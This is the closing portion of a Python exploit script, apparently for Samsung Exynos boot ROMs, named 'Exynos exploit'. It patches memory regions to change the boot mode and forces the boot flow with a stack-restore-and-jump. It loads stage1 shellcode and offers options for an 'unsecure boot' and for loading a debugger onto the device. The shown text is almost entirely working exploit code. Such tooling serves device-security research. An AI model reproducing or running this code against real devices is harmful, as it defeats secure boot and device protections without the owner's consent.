        # off = stage4.find(bytes.fromhex("fd 7b bd a9 fd 03 00 91 f3 53 01 a9 d4 08 00 d0 f3 03 01 2a a0 17 00 f9"))
        # stage4 = stage4[off:] + print_payload + stage4[off+len(print_payload):]

        # Change bootmode to SDCARD (allow normal booting, if pressing volume up)
        self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
        self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))

        # Move default values into registers
        self.cd.memwrite_region(0x8f021bac, struct.pack('>I', 0x20008052))
        self.cd.memwrite_region(0x8f021bdc, struct.pack('>I', 0x20008052))
        self.cd.memwrite_region(0x8f021bbc, struct.pack('>I', 0x20008052))

        # Jump into a different function that continues the boot flow (different than BL33_LR)
        self.cd.restore_stack_and_jump(0x02024e5c)

        pass



if __name__ == "__main__":
    arg = argparse.ArgumentParser("Exynos exploit")
    arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
    arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
    arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
    arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
    arg.add_argument("--MIB3", action="store_true", help="Whether boot is on a MIB3", default=False)

    args = arg.parse_args()
    exynos = S7Exploit()

    if args.debug:
        shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
        exynos.exploit(shellcode)
        exynos.dump_memory(write=True)
        # exynos.usb_debug()
        sys.exit(0)

    elif args.unsecure_boot:
        exynos.unsecure_boot()
        sys.exit(0)

    stage1 = open("stage1/stage1.bin", "rb").read()
    exynos.exploit(stage1)

    if args.debugger_boot:
        exynos.debugger_boot()
        sys.exit(0)

    exynos.setup_guppy_debugger()
    if args.load_ga:
        info("Loaded gupje, exiting")
        sys.exit(0)
    exynos.dumb_interact()

    sys.exit(0)